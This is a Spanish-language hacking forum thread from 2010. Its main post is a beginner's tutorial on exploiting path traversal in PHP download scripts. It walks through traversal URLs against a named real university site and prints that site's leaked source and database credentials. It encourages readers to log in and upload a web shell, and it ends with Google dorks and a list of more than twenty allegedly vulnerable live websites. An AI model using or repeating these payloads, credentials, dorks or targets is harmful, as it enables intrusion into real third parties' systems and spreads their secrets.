comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Arbytrary downloader. [ TEXT ] By xBlacK

  • 1 Respuestas
  • 1685 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Devilboy

  • *
  • Underc0der
  • Mensajes: 328
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Julio 05, 2010, 02:25:28 pm »
Es una temprana noche lluviosa de domingo... ajajaja da un chingo de hueva no tener lana y no poder salir asi que decidi hacer un pequeño text.

Bien, a los que no saben que es esta vulnerabilidad les caera de perlas.


Arbitrary downloader a mi forma de verlo es una web-vulnerability muy ... atractiva, ya que los administradores de las webs solo checan que se bajen archivos de su servidor... pero nunca revisan cuantos se pueden bajar jejeje.

Utlizare un ejemplo real para que puedan entenderlo: (al final estan dorks que pueden usar)

Universidad Federal Rural de Pernambuco:

Código: [Seleccionar]
www.ufrpe.br/aci/download.php?endArquivo=vemos que al pegar la URL en nuestro navegador nos lanza una descarga llamada "arquivos"...

TIP: esto quiere decir que en el archivo download.php esta configurado para que baje los archivos de la carpeta "arquivos". por lo que nuestra inyeccion en la url seria asi:

Código: [Seleccionar]
www.ufrpe.br/aci/download.php?endArquivo=../download.php


y voala :P nos aparecera el archivo "download.php" para descargasnolo y leer que es lo que tiene...

sigamos con lo interesante... para que quiero el archivo download? si nomas hace que descarge cosas... Bien, en algunos "downloads" requieren de la conexion a la base de datos para saber el id del archivo... por lo que aparecera un requere o un include en el download... pero bueno solo es por si las dudas...

en este caso nuestro codigo es el siguiente:

Código: [Seleccionar]
<?
$strBrowser = $_SERVER['HTTP_USER_AGENT'];
if (preg_match('/MSIE 5.5/',$strBrowser) || preg_match('/MSIE 6.0/',$strBrowser)) {
$compMime = "application/download";
}else{
$compMime = "application/download";
}


$strNomeArquivo = "arquivos/".$_GET['endArquivo'];
  header("Pragma: public");
     header("Expires: 0"); // set expiration time
     header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
     header("Content-Type: application/force-download");
     header("Content-Type: application/download");
     header("Content-Type: text/plain");
header("Content-Disposition: attachment; filename=".basename(str_replace(" ","_",$strNomeArquivo)).";");     
     header("Content-Transfer-Encoding: binary");
     header("Content-Length: ".filesize($strNomeArquivo));
     readfile("$strNomeArquivo");
?>



no existe mas que la configuracion y validacion de los archivos a descargar... no me metere a explicarlo porque la idea es dar una idea abierta a esta vulnerabilidad.

vemos la pagina que tenemos de ejemplo: http://www.ufrpe.br/

dames en el boton "home" o "inicio" y vemos que en la URL nos aparece /index.php

Vamos por ese archivo a nuestra url de descarga asi:

Código: [Seleccionar]
www.ufrpe.br/aci/download.php?endArquivo=../index.php


lo abrimos, checamos y en la cabecera vemos que incluye otro archivo... template.php

Código: [Seleccionar]
<?php $home=true;
$menu_on 'index';
include_once(
'template.php'); ?>



vamos por el...

Código: [Seleccionar]
www.ufrpe.br/aci/download.php?endArquivo=../template.php


vemos, revisamos y vemos que ahi tiene un include interesante:
includes/init.inc.php

Código: [Seleccionar]
<?
include_once("includes/init.inc.php");
$idiomaTemplate = _COOKIE_IDIOMA;
$idiomaTemplate = "";

?>



ahora toca a includes/init.inc.php ser parte de nuestra coleccion...

Código: [Seleccionar]
www.ufrpe.br/aci/download.php?endArquivo=../includes/init.inc.php


en el encontraremos otro archivito jajajaja, cansado? a veces es laborioso buscar los archivos... pero bueno juro que el proximo es el ultimo.

abrimos y vemos que incluye:../includes/conexao.php

   
Código: [Seleccionar]
include_once("../includes/conexao.php");


nos lo bajamos con la siguiente url:

Código: [Seleccionar]
www.ufrpe.br/aci/download.php?endArquivo=../../includes/conexao.php


y voala... tendremos lo maravilloso que hace a las bases de datos:

Código: [Seleccionar]
<?
$dbConn = pg_connect("host=localhost port=5432 user=webuser password=DMv@19,% dbname=webufrpedb")or die("erro");

?>

Host: localhost (si tiene localhost puede que tenga un gestor de administracion como pgpmyadmin, phpmyadmin, etc..)

user: webuser

contraseña: DMv@19,%



Ahora solo les quedara buscar como logearse y dependiendo de su criterio subir una shell por medio del mismo gestor, o buscar el login y pass del administrador y logearse y hacer lo que se les de la gana...

Espero haber dado una idea clara a aquellos que no conocian esta vulnerabilidad, o que comienzan en el hack.

Código: [Seleccionar]
dorks:
[*] = com, net, org, etc...
[**]= tipo de archivos doc, psd, pdf, pps, etc...

allinurl:[*] "download.php" [**]
allinurl:[*] "downloads.php" [**]
allinurl:[*] "descargas.php" [**]
allinurl:[*] "descargar.php" [**]
allinurl:[*] "descarga.php" [**]
allinurl:[*] "bajar.php" [**]
allinurl:[*] "force-download.php" [**]


algunas webs vulnerables:

www.redalimentaria.com/archivos/descarga.php?id=
media.eleconomista.com.mx/contenido/pdf/descarga.php?file=
www.aoaxaca.com/descarga.php?f=
www.colibrimty.com/descarga.php?file=
www.probecarios.com/descarga.php?file=
phytomedicamenta.com/descarga.php?
www.asambleaapostolicamexico.com/descarga.php?tipo=
www.latinpowermusic.com.mx/datos/boletin/c18/descarga.php?a=
www.plenumsoft.com/download.php?file=
www.miempaque.com/download.php?Archivo=
factum-marketing.com/download.php?file=
deimaginaria.com/download.php?file=
coripa.com.ar/download.php?t=
everdaguer.com/pares/docs/download.php?file=
steelpool.com/download.php?id=
licitaciones.iplan.com.ar/download.php?id=
trenesenescala.com/descargas/download.php?f=
marlenadeblasi.com/download.php?doc=
cvarbitraje.com/force-download.php?file=
cayetanogutierrez.com/download.php?doc=
medicamail.com/download.php?file=
soraya.com/download.php?download=
municipioiquique.com/doc/download.php?link=
marcosrosenzvaig.com.ar/download.php?archivo=
camara-comercio.com/download.php?file=required/connect.php
rodrigomatarrita.com/inc/download.php?file=

Fuente:DDLR


Veo Una Energia Que Con Deceo de Justicia... Veo Mas Alla de LAs Letras Escritas...
Veo Un Hacktivismo Puro... Nacido De lo Mas Profundo De un Corazon..
Con La Mirada Firme En Defender Mis Ideales...


Desconectado Harakiri

  • *
  • Underc0der
  • Mensajes: 92
  • Actividad:
    0%
  • Reputación 0
  • ~Lets hack like its 1998!
    • Ver Perfil
    • Email
« Respuesta #1 en: Julio 05, 2010, 02:43:23 pm »
Bien, bien , bien =) me gusto! gracias por compartir! ta bueno!


 

¿Te gustó el post? COMPARTILO!



[TUTORIAL] Arbytrary downloader by SkillmaX

Iniciado por SkillmaX

Respuestas: 3
Vistas: 1886
Último mensaje Julio 13, 2010, 02:47:29 pm
por 303010